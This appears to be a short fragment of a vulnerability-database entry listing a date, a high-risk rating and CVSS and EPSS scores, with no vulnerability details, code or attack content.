29 May 2026 00:00 — Current
7.5 — High risk
Vulners AI Score: 7.5
CVSS 3.1: 8.8
EPSS: 0.00952
SSVC
22